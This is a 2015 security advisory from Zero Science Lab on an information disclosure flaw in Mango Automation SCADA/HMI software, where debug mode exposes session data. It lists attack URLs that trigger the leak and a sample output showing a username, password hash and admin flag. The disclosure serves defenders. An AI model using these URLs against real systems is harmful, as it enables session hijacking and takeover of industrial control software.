Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability


Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)

Summary: Mango Automation is a flexible SCADA, HMI
And Automation software application that allows you
to view, log, graph, animate, alarm, and report on
data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.

Desc: Mango Automation suffers from information disclosure
vulnerability because it contains default configuration for
debugging enabled in the '/WEB-INF./web.xml' file (debug=true).
An attacker can entice a logged-in user to visit a specially
crafted URL which will produce a system exception with stack
trace on the Jetty server. When this error occurs, the debug
option generates a status page with all the information from
the visitor, meaning that the attacker is able to see usernames,
password hashes, e-mails and of course, Cookie sessions). Using
the generated error, the attacker can easily perform session
hijacking and take over the system using previously discovered
vulnerabilities by just visiting the status page non-authenticated.

Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
           Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
           Jetty(9.2.2.v20140723)
           Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
           Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php


20.08.2015

--


One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):

 - http://localhost:8080/status/
 
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:

 - http://localhost/status/mango.json?time=$
 - http://localhost/status/


Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n   sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n   LONG_POLL_DATA_TIMEOUT=1440143583487\r\n   LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n   DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n   constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n   constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n   constants.Permissions.DataPointAccessTypes.READ=1\r\n   org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n   constants.DataTypes.BINARY=1\r\n   constants.UserComment.TYPE_EVENT=1\r\n   constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n   javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n   


Also you can list all of the Classes known to DWR:

 - http://localhost:8080/dwr/index.html